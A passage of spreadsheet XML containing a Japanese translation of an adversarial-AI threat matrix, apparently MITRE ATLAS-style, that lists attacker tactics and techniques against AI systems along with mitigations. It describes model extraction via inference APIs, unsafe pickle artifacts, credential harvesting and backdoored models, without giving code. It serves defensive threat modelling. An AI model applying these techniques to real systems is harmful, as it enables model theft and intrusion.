    <t>敵対者は、プライベート モデルをレプリケーションする可能性があります。敵対者は、被害者の [AI モデルの推論 API へのアクセス](/techniques/AML.T0040) を繰り返しクエリーすることで、標的のモデルの推論をデータセットに収集できます。推論は、標的のモデルの動作とパフォーマンスを模倣する別のモデルをオフラインで学習するためのラベルとして使用されます。
標的のモデルを厳密に模倣する複製したモデルは、攻撃をステージングするための貴重なリソースです。敵対者は、複製したモデルを使用して、さまざまな目的（例: [AI モデルの回避](/techniques/AML.T0015)、[AI システムに対するチャフ データを使用したスパム攻撃](/techniques/AML.T0046)）で [敵対的データの作成](/techniques/AML.T0043) を行うことができます。</t>
  </si>
  <si>
    <t>安全でない AI アーティファクト</t>
  </si>
  <si>
    <t>敵対者は、実行されると有害な影響を及ぼす安全でない AI アーティファクトを開発する可能性があります。敵対者は、この手法を使用して、システムへの永続的なアクセスを確立できます。これらのモデルは、[AI サプライ チェーンの侵害](/techniques/AML.T0010) によって導入される可能性があります。
モデルのシリアル化は、モデルの保存、転送、および読み込みによく使用される手法です。ただし、適切なチェックを行わないこの形式は、コード実行の機会をもたらします。</t>
  </si>
  <si>
    <t>セキュリティ上問題のある資格情報</t>
  </si>
  <si>
    <t>敵対者は、侵害済みのシステムを検索して、セキュリティ上問題のある状態で保存された資格情報を見つけて取得する可能性があります。
これらの資格情報は、平文テキスト ファイル（bash 履歴など）、環境変数、オペレーティング システム、またはアプリケーション固有のリポジトリ（レジストリ内の資格情報など）、またはその他の特殊なファイル/アーティファクト（秘密鍵など）など、システム上のさまざまな場所に保存されたり、誤配置されたりする可能性があります。</t>
  </si>
  <si>
    <t>学習済みモデルの使用</t>
  </si>
  <si>
    <t>敵対者は、攻撃のステージングを支援するために、既製の事前学習済みモデルを被害者モデルのプロキシーとして使用する可能性があります。</t>
  </si>
  <si>
    <t>ユーザーによる実行</t>
  </si>
  <si>
    <t>敵対者は、実行権限を得るために、ユーザーの特定のアクションに頼る場合があります。ユーザーは、[AI サプライ チェーンの侵害](/techniques/AML.T0010) によって導入された安全でないコードを誤って実行する可能性があります。ユーザーは、例えば悪意のある文書ファイルまたはリンクを開くことによって悪意のあるコードを実行させられるソーシャル エンジニアリングの対象となる可能性があります。</t>
  </si>
  <si>
    <t>ユーザー被害</t>
  </si>
  <si>
    <t>ユーザー被害には、組織レベルではなく、被害者個人に向けられたり被害者個人が感じたりする金銭的被害や風評被害など、さまざまな種類の被害が含まれる可能性があります。</t>
  </si>
  <si>
    <t>有効なアカウント</t>
  </si>
  <si>
    <t>敵対者は、初期アクセスを獲得する手段として、既存のアカウントの資格情報を入手して悪用する可能性があります。資格情報は、個々のユーザー アカウントのユーザー名とパスワード、またはさまざまな AI リソースとサービスへのアクセスを提供する API キーの形式をとる場合があります。
侵害された資格情報により、追加の AI アーティファクトへのアクセスが提供され、敵対者が [AI アーティファクトの探索](/techniques/AML.T0007) を実行できるようになります。侵害された資格情報により、開発中または実稼働環境で使用される AI アーティファクトへの書き込みアクセスなど、敵対者に権限が付与される可能性もあります。</t>
  </si>
  <si>
    <t>攻撃の検証</t>
  </si>
  <si>
    <t>敵対者は、推論 API または標的のモデルのオフライン コピーへのアクセスを介して攻撃の有効性を検証できます。これにより、敵対者は、アプローチが機能するという確信を得ることができ、後で任意のタイミングで攻撃を実行できます。敵対者は、一度だけ攻撃を検証しますが、標的のモデルのコピーを実行している多くのエッジ デバイスに対してそれを使用する可能性があります。敵対者は、攻撃をデジタルで検証し、後で [物理環境へのアクセス](/techniques/AML.T0041) にそれを展開する可能性があります。敵対者は、最小限の数のクエリーまたはモデルのオフライン コピーを使用できるため、攻撃の検証を検出するのは困難です。</t>
  </si>
  <si>
    <t>ホワイト ボックス最適化</t>
  </si>
  <si>
    <t>ホワイト ボックス最適化では、敵対者は標的のモデルに完全なアクセスが可能であり、敵対的なサンプルを直接最適化します。この方法で学習した敵対的なサンプルは、標的のモデルに対して最も効果的です。</t>
  </si>
  <si>
    <t>AI 攻撃のステージング</t>
  </si>
  <si>
    <t>敵対者は、標的のシステムに関する知識とアクセスを活用して、攻撃をカスタマイズします。
AI 攻撃のステージングは​​、攻撃者が標的の AI モデルへの攻撃を準備するために使用する手法で構成されます。手法には、プロキシー モデルの学習、標的のモデルの汚染、標的のモデルに入力する敵対的データの作成などがあります。これらの手法の一部はオフラインで実行できるため、軽減が困難です。これらの手法は、敵対者の最終目標を達成するためによく使用されます。</t>
  </si>
  <si>
    <t>AI モデルへのアクセス</t>
  </si>
  <si>
    <t>敵対者は、AI モデルへの何らかのレベルのアクセスを取得しようとします。
AI モデルへのアクセスにより、AI モデルへのさまざまな種類のアクセスを使用する手法が利用可能になります。このアクセスは、敵対者が情報を取得したり、攻撃を開発したり、モデルにデータを入力する手段として使用できます。アクセス レベルは、モデルの内部を完全に把握することから、AI モデルで使用するためにデータが収集される物理環境へのアクセスまでに渡り、さまざまです。敵対者は、攻撃のステージングから標的のシステムへ影響を及ぼすことに至るまでといった攻撃の過程でさまざまなレベルのモデル アクセスを使用する可能性があります。
AI モデルへのアクセスには、モデルが格納されているシステムへのアクセスが必要な場合があります。モデルは、API 経由で公にアクセス可能である場合もあれば、プロセスの一部として AI を利用する製品またはサービスとのやり取りを通じて間接的にアクセスされる場合もあります。</t>
  </si>
  <si>
    <t>収集</t>
  </si>
  <si>
    <t>敵対者は、AI アーティファクトや、その目的に関連するその他の関連情報を収集しようと試みます。
収集は、敵対者が情報を収集するために使用する可能性のある手法と、攻撃者の目的の達成に関連する情報を収集するソースで構成されます。多くの場合、データ収集後の次の目標は、AI アーティファクトを窃取する（持出す）か、収集した情報を使用して今後の作戦を準備することです。対象となる一般的なソースには、ソフトウェア リポジトリ、コンテナー レジストリ、モデル リポジトリ、オブジェクト ストアなどがあります。</t>
  </si>
  <si>
    <t>コマンド＆コントロール</t>
  </si>
  <si>
    <t>敵対者は、侵害された AI システムと通信して制御下に置こうとします。
コマンド＆コントロール（C&amp;C）とは、敵対者が標的ネットワーク内で制御下にあるシステムと通信するために使用する可能性のある手法です。敵対者は、通常、検出を回避するために、通常の想定内トラフィックを模倣しようとします。これには多くの方法が存在し、敵対者が標的のネットワーク構造と防御策に応じて様々なレベルのステルス性で C&amp;C を確立できます。</t>
  </si>
  <si>
    <t>資格情報へのアクセス</t>
  </si>
  <si>
    <t>敵対者は、アカウント名とパスワードを窃取しようと試みます。
資格情報へのアクセスは、アカウント名やパスワードなどの資格情報を盗むための手法です。資格情報を取得するために使用される手法には、キー ロギングや資格情報のダンプなどがあります。正規の資格情報を使用すると、敵対者はシステムにアクセスでき、検出されにくくなり、目的を達成するためにさらに多くのアカウントを作成する機会を得られます。</t>
  </si>
  <si>
    <t>防御策の回避</t>
  </si>
  <si>
    <t>敵対者は、AI 対応のセキュリティ ソフトウェアによる検出を回避しようとします。
防御策の回避は、敵対者が侵害中に検出されることを回避するために使用する手法です。防御策の回避に使用される手法には、マルウェア検出器などの AI 対応のセキュリティ ソフトウェアの回避が含まれます。</t>
  </si>
  <si>
    <t>探索</t>
  </si>
  <si>
    <t>敵対者は、被害者組織の AI 環境を解明しようとします。
探索は、敵対者がシステムと内部ネットワークに関する知識を得るために使用する可能性のある手法です。これらの手法は、敵対者が環境を観察し、行動方法を決定する前に方向を決めるのに役立ちます。また、敵対者は、制御できるものやエントリ ポイントの周囲にあるものを調べて、それが現在の目的にどのように役立つかを発見することもできます。オペレーティング システムのネイティブ ツールは、この侵害後の情報収集の目的のためによく使用されます。</t>
  </si>
  <si>
    <t>実行</t>
  </si>
  <si>
    <t>敵対者は、AI アーティファクトまたはソフトウェアに埋め込まれた悪意のあるコードを実行しようとします。
実行は、敵対者が制御しローカル システムまたはリモート システムでコードを実行する手法で構成されます。悪意のあるコードを実行する手法は、ネットワークの探索やデータの盗難など、より広範な目標を達成するために、他のすべての戦術の手法と組み合わせられることがよくあります。例えば、敵対者はリモート アクセス ツールを使用して、リモート システムの探索を行う PowerShell スクリプトを実行する場合があります。</t>
  </si>
  <si>
    <t>持出し</t>
  </si>
  <si>
    <t>敵対者は、AI アーティファクトや機械学習システムに関するその他の情報を盗もうとします。
持出しは、敵対者がネットワークからデータを窃取するために使用する可能性のある手法です。データは、その貴重な知的財産のために窃取される場合もあれば、今後の作戦の準備のために搾取される場合もあります。
標的のネットワークからデータを持出す手法には、通常、コマンド &amp;コントロール チャネルまたは代替チャネルを介してデータを転送することや、送信にサイズ制限を設けることなどがあります。</t>
  </si>
  <si>
    <t>影響</t>
  </si>
  <si>
    <t>敵対者は、AI システムとデータを操作し、妨害し、信頼を損なわせ、破壊しようとします。
影響とは、ビジネス プロセスと運用プロセスを操作して可用性を妨害したり整合性を損なったりするために敵対者が使用する手法です。影響に使用される手法には、データの破壊や改ざんが含まれます。場合によっては、ビジネス プロセスは問題ないように見えても、敵対者の目的にかなうように変更されている可能性があります。敵対者は、これらの手法を使用して、最終目的を達成したり、機密性侵害を隠蔽したりすることがあります。</t>
  </si>
  <si>
    <t>初期アクセス</t>
  </si>
  <si>
    <t>敵対者は、AI システムにアクセスしようとします。
標的のシステムは、ネットワーク、モバイル デバイス、またはセンサー プラットフォームなどのエッジ デバイスである可能性があります。システムで使用される AI 機能は、オンボードまたはクラウド対応の AI 機能を備えたローカルである可能性があります。
初期アクセスは、さまざまなエントリ ベクトルを使用してシステム内で最初の足掛かりを得る手法で構成されます。</t>
  </si>
  <si>
    <t>永続化</t>
  </si>
  <si>
    <t>敵対者は、AI アーティファクトやソフトウェアを介して足掛かりを維持しようとします。
永続化は、再起動、資格情報の変更、アクセスを遮断する可能性のあるその他の中断があっても、敵対者がシステムへのアクセスを維持するために使用する手法です。永続化に使用される手法には、多くの場合、汚染された学習データやバックドアが仕掛けられた AI モデルなどといった改変された AI アーティファクトを残すことが含まれます。</t>
  </si>
  <si>
    <t>権限昇格</t>
  </si>
  <si>
    <t>敵対者は、より高いレベルの権限を取得しようとします。
権限昇格は、敵対者がシステムまたはネットワークでより高いレベルの権限を取得するために使用する手法です。敵対者は、多くの場合、権限のないアクセスでネットワークに侵入して探索できますが、目的を達成するには、権限を昇格する必要があります。一般的なアプローチは、システムの弱点、誤った構成、脆弱性を利用することです。権限を昇格したアクセスの例には、次のものがあります。
- システム/ルート レベル
- ローカル管理者
- 管理者のようなアクセス権を持つユーザー アカウント
- 特定のシステムにアクセスしたり、特定の機能を実行したりできるユーザー アカウント
これらの手法は、敵対者を永続化する OS 機能が権限昇格したコンテキストで実行できるため、永続化の手法と重複することがよくあります。</t>
  </si>
  <si>
    <t>偵察</t>
  </si>
  <si>
    <t>敵対者は、AI システムに関して今後の作戦計画に使用できる情報を収集しようとします。
偵察は、敵対者が標的を設定することを支援するために使用できる情報を積極的または受動的に収集する手法です。このような情報には、被害者組織の AI 機能や研究活動の詳細が含まれる場合があります。この情報は、敵対者が収集した情報を使用して関連する AI アーティファクトを取得したり、被害者が使用する AI 機能を標的にしたり、被害者が使用する特定のモデルに合わせて攻撃を調整したり、さらなる偵察活動を推進および主導したりするなど、攻撃者のライフサイクルの他のフェーズを支援するために活用できます。</t>
  </si>
  <si>
    <t>リソースの開発</t>
  </si>
  <si>
    <t>敵対者は、作戦を支援するために使用できるリソースを構築しようとします。
リソースの開発は、敵対者が標的を設定することを支援するために使用できるリソースを作成、購入、または侵害/盗難する手法で構成されます。このようなリソースには、AI アーティファクト、インフラストラクチャ、アカウント、または機能が含まれます。これらのリソースは、敵対者が [AI 攻撃のステージング](/tactics/AML.TA0001) などの攻撃ライフサイクルの他のフェーズを支援するために活用できます。</t>
  </si>
  <si>
    <t>関連引用</t>
  </si>
  <si>
    <t>AI 部品表</t>
  </si>
  <si>
    <t>AI 部品表（AI BOM）には、AI の構築に使用されたアーティファクトとリソースの完全なリストが含まれています。AI 部品表は、サプライ チェーンのリスクを軽減し、報告された脆弱性への迅速な対応を可能にします。
これには、データセットの出所、つまり AI アプリケーションに使用されたデータセットの詳細な履歴の維持が含まれます。履歴には、データセットのソースに関する情報だけでなく、変更内容の完全な記録も含まれる場合があります。</t>
  </si>
  <si>
    <t>AI モデルの配布方法</t>
  </si>
  <si>
    <t>AI モデルをエッジ デバイスにデプロイすると、システムの攻撃対象領域が増大する可能性があります。敵対者がモデルにアクセスするレベルを下げるために、クラウド内でモデルを提供することを検討する必要があります。また、敵対者がモデルの前処理方法にアクセスできるグレー ボックス攻撃を防ぐために、クラウド内でのコンピューティング機能も検討する必要があります。</t>
  </si>
  <si>
    <t>AI テレメトリのログ記録</t>
  </si>
  <si>
    <t>デプロイされた AI モデルの入出力のログ記録を実装します。ログを監視することで、セキュリティ上の脅威を検出し、影響を軽減することができます。
さらに、ログ記録を有効にすると、検出を回避したい敵対者が AI リソースを利用するのを阻止できます。</t>
  </si>
  <si>
    <t>敵対的入力の検出</t>
  </si>
  <si>
    <t>既知の無害な動作から逸脱したり、以前の攻撃で観察された動作パターンを示したり、潜在的に悪意のある IP アドレスから送信されたりする敵対的な入力や異常なクエリーを検出してブロックします。AI モデルより前に、敵対的検出アルゴリズムを AI システムに組み込みます。</t>
  </si>
  <si>
    <t>コード署名</t>
  </si>
  <si>
    <t>デジタル署名の検証によってバイナリとアプリケーションの整合性を強化し、信頼できないコードの実行を防ぎます。敵対者は AI ソフトウェアまたはモデルに悪意のあるコードを埋め込む可能性があります。コード署名の強化により、AI サプライ チェーンの侵害を防ぎ、悪意のあるコードの実行を防ぐことができます。</t>
  </si>
  <si>
    <t>保存されている AI モデルとデータへのアクセスの制御</t>
  </si>
  <si>
    <t>内部のモデル レジストリへのアクセス制御を確立し、実稼働モデルへの内部アクセスを制限します。学習データへのアクセスは、承認されたユーザーのみに制限します。</t>
  </si>
  <si>
    <t>実稼働環境の AI モデルとデータへのアクセスの制御</t>
  </si>
  <si>
    <t>実稼働モデルにアクセスする前に、ユーザーに ID の検証を要求します。API エンドポイントの認証を要求し、実稼働モデルのクエリを監視して、使用ポリシーに準拠していることを確実にし、モデルの悪用を防止します。</t>
  </si>
  <si>
    <t>機密情報の暗号化</t>
  </si>
  <si>
    <t>AI モデルなどの機密データを暗号化して、機密データにアクセスを試みる敵対者から保護します。</t>
  </si>
  <si>
    <t>生成 AI ガードレール</t>
  </si>
  <si>
    <t>ガードレールとは、生成 AI モデルとユーザーと共有される出力の間に設置される安全対策であり、望ましくない入出力を防ぎます。ガードレールは、フィルター、ルールベース ロジック、正規表現などの検証ツールや、分類器や LLM の活用、固有表現抽出（NER）などの AI ベースのアプローチを用いて、プロンプトや応答の安全性を評価することができます。ドメイン固有の手法を用いることで、エチケット、ブランド毀損、脱獄、偽情報、コード エクスプロイト、SQL インジェクション、データ漏洩など、様々な分野におけるリスクを軽減できます。</t>
  </si>
  <si>
    <t>生成 AI ガイドライン</t>
  </si>
  <si>
    <t>ガイドラインとは、ユーザー入力と生成 AIモ デルの間に配置され、モデルが望ましい出力を生成し、望ましくない出力を防止するための安全対策です。
ガイドラインは、すべてのユーザー プロンプトに指示を追加する形で実装することも、システム プロンプト内の指示の一部として実装することもできます。ガイドラインは、システムの目標、役割、意思を定義し、安全性とセキュリティに関するパラメータの概要を示すことができます。</t>
  </si>
  <si>
    <t>生成 AI モデルの整合性（アライメント）</t>
  </si>
  <si>
    <t>生成 AI モデルを学習または微調整する際には、安全性、セキュリティ、コンテンツ ポリシーとのモデルの整合性（アライメント）を改善する手法を活用することが重要です。
微調整プロセスにより、生成 AI モデルに組み込まれた安全機構が削除される可能性がありますが、教師ありの微調整、人間からのフィードバックまたは AI フィードバックからの強化学習、対象を絞った安全性コンテキスト蒸留などの手法を利用することで、モデルの安全性と整合性（アライメント）を向上させることができます。</t>
  </si>
  <si>
    <t>入力の復元</t>
  </si>
  <si>
    <t>すべての推論データを前処理して、潜在的な敵対的摂動を無効化または逆転させます。</t>
  </si>
  <si>
    <t>モデル アーティファクトの公開の制限</t>
  </si>
  <si>
    <t>実稼働環境で使用されている、または実稼働環境で使用されているものを代表するデータ、アルゴリズム、モデル アーキテクチャ、モデル チェックポイントなどの技術的なプロジェクトの詳細の公開を制限します。</t>
  </si>
  <si>
    <t>公開情報の開示の制限</t>
  </si>
  <si>
    <t>組織の製品やサービスで使用されている AI スタックに関する技術情報の公開を制限します。AI の使用方法に関する技術的知識は、敵対者が標的を定めて攻撃を標的のシステムにカスタマイズするために利用される可能性があります。さらに、AI の手法、モデル アーキテクチャ、データセットなどの技術的な詳細を推測できる組織の情報（物理的な場所、研究者の名前、部門構造など）の公開を制限することを検討する必要があります。</t>
  </si>
  <si>
    <t>AI データセットの出所の維持</t>
  </si>
  <si>
    <t>AI アプリケーションに使用されるデータセットの詳細な履歴を維持します。履歴には、データセットのソースに関する情報と、変更内容の完全な記録を含める必要があります。</t>
  </si>
  <si>
    <t>モデルの堅牢化</t>
  </si>
  <si>
    <t>敵対的学習やネットワーク蒸留などの敵対的入力に対して AI モデルを堅牢にするための手法を使用します。</t>
  </si>
  <si>
    <t>AI 出力のパッシブ オブファスケーション</t>
  </si>
  <si>
    <t>エンド ユーザーに提供されるモデル出力の忠実度を下げると、敵対者がモデルに関する情報を抽出し、モデルに対する攻撃を最適化する能力が低下する可能性があります。</t>
  </si>
  <si>
    <t>ライブラリ読み込みの制限</t>
  </si>
  <si>
    <t>適切なライブラリ読み込み機構を構成し、潜在的に脆弱なソフトウェアを調査することで、オペレーティング システムとソフトウェアのライブラリー読み込み機構が悪用されることや信頼できないコードが読み込まれることを防ぎます。
pickle ファイルなど機械学習モデルを保存するために一般的に使用されるファイル形式には、悪意のあるライブラリを読み込むエクスプロイトが含まれている可能性があります</t>
  </si>
  <si>
    <t>AI モデルへのクエリ数の制限</t>
  </si>
  <si>
    <t xml:space="preserve">ユーザーが実行できるクエリの合計数とレートを制限します。
</t>
  </si>
  <si>
    <t>学習データの無害化</t>
  </si>
  <si>
    <t xml:space="preserve">汚染された学習データを検出し、削除または修復します。学習データは、モデルの学習の前、およびアクティブ ラーニング モデルの場合は定期的に無害化する必要があります。
取り込まれた学習データを制限するフィルターを実装します。特定の露骨な言葉や攻撃的な言葉などの不要なコンテンツの使用を排除するコンテンツ ポリシーを確立します。
</t>
  </si>
  <si>
    <t>アンサンブル法の使用</t>
  </si>
  <si>
    <t>敵対的入力に対する堅牢性を高めるために、推論にモデルのアンサンブルを使用します。一部の攻撃は、1 つのモデルまたはモデル ファミリーを効果的に回避できますが、他のモデルに対しては効果がない場合があります。</t>
  </si>
  <si>
    <t>マルチモーダル センサーの使用</t>
  </si>
  <si>
    <t>複数のセンサーを組み込んでさまざまな視点とモダリティを統合し、物理的な攻撃を受けやすい単一障害点を回避します。</t>
  </si>
  <si>
    <t>ユーザーの研修</t>
  </si>
  <si>
    <t>安全なコーディング手法と AI の脆弱性について、AI モデル開発者に教育を行います。</t>
  </si>
  <si>
    <t>AI モデルの検証</t>
  </si>
  <si>
    <t>バックドア トリガーや敵対的バイアスをテストして、AI モデルが意図したとおりに機能することを検証します。モデルの概念ドリフトと学習データ ドリフトを監視します。これらは、データの改ざんや汚染を示す可能性があります。</t>
  </si>
  <si>
    <t>AI アーティファクトの検証</t>
  </si>
  <si>
    <t>すべての機械学習アーティファクトの暗号チェックサムを検証して、ファイルが敵対者によって変更されていないことを確認します。</t>
  </si>
  <si>
    <t>脆弱性スキャン</t>
  </si>
  <si>
    <t>脆弱性スキャンは、潜在的に悪用される可能性のあるソフトウェアの脆弱性を発見し、修正するために使用されます。
AI モデルの保存に一般的に使用される pickle ファイルなどのファイル形式には、任意のコード実行を可能にするエクスプロイトが含まれている可能性があります。これらのファイルは、コードの実行、新しいプロセスの作成、ネットワーク機能の確立に使用される可能性のある潜在的に安全でない呼び出しがないかスキャンする必要があります。敵対者は、モデルが破損したファイルに悪意のあるコードを埋め込む可能性があるため、スキャナーは完全にデシリアライズできないモデルでも動作できる必要があります。モデル アーティファクトと、モデルによって生成されるダウン ストリーム製品の両方に対して、既知の脆弱性がないかスキャンする必要があります。</t>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="4">
    <numFmt numFmtId="43" formatCode="_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="176" formatCode="_-&quot;\&quot;* #,##0_-\ ;\-&quot;\&quot;* #,##0_-\ ;_-&quot;\&quot;* &quot;-&quot;??_-\ ;_-@_-"/>
    <numFmt numFmtId="177" formatCode="_ * #,##0_ ;_ * \-#,##0_ ;_ * &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="178" formatCode="_-&quot;\&quot;* #,##0.00_-\ ;\-&quot;\&quot;* #,##0.00_-\ ;_-&quot;\&quot;* &quot;-&quot;??_-\ ;_-@_-"/>
  </numFmts>
  <fonts count="29">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="128"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="128"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF800080"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFA7D00"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="0"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF800080"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFA7D00"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF3F3F76"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF9C6500"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFFFFFF"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF006100"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color theme="3"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color rgb="FF7F7F7F"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF3F3F3F"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <color theme="3"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="3"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color theme="3"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF9C0006"/>
      <name val="ＭＳ Ｐゴシック"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="35">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0" tint="-0.25"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF00B050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF2F2F2"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7"/>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rgb="FFFFCC99"/>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rgb="FFA5A5A5"/>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4"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8"/>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799981688894314"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="12">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0" fontId="15" fillId="12" borderId="4" applyNumberFormat="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0" fontId="12" fillId="7" borderId="0" applyNumberFormat="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top"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="17" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="18" borderId="6" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="20" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14"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23" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="4" borderId="8" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="9" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="9" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="4" borderId="4" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="10" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="26" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="19" borderId="7" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="30" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="11" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="31" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
